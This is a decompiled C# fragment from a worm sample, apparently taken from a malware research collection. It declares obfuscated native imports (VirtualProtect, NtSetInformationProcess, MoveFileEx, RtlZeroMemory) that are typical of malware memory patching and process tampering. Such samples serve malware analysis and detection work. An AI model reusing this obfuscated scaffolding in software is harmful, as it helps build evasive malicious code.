// Decompiled with JetBrains decompiler // Type: Ҧ߲๒ʽ໙ୄᴘ.٧Ѹ // Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe using System; using System.Runtime.InteropServices; namespace Ҧ߲๒ʽ໙ୄᴘ { internal class \u0667Ѹ { [DllImport("kernel32.dll", EntryPoint = "MoveFileEx", CharSet = CharSet.Unicode, SetLastError = true)] public static extern bool \u1936\u0A50Ȁ\u0A84ᠬ\u1AE7(string ᡋત, string ᯌ, \u0667Ѹ.ቩᩬᐜ̯ṅडၿ ጆйἕછ); [DllImport("kernel32.dll", EntryPoint = "VirtualProtect", SetLastError = true)] public static extern bool \u171F\u1B67ΨƱࠏ( IntPtr _param0, uint _param1, uint _param2, out uint ҙᘐ); [DllImport("Kernel32.dll", EntryPoint = "RtlZeroMemory")] public static extern void \u0CC4\u1C9B\u1BFD(IntPtr _param0, IntPtr ԥྗ); [DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", SetLastError = true)] public static extern int ଠঅྼ(IntPtr _param0, int _param1, ref int _param2, int ݯ); [DllImport("kernel32.dll", EntryPoint = "GetModuleHandle", CharSet = CharSet.Auto)] public static extern IntPtr \u1395้ỿ(string ǝᢴ); [Flags] public enum ቩᩬᐜ̯ṅडၿ { ʻᎠಊѝ = 1, \u0DD6\u0B70ᤰႺʮᦽះ = 2, ᑹ\u17FCנᒞ͍ሴǒ = 4, Բዙຸ\u19FA\u1B69 = 8, ଯ\u192Eψᜤ\u0DB2ᴿ\u0099 = 16, // 0x00000010 ᅮᒒᑖŹҒ\u0EFBᨬᆵᮖ = 32, // 0x00000020 } } }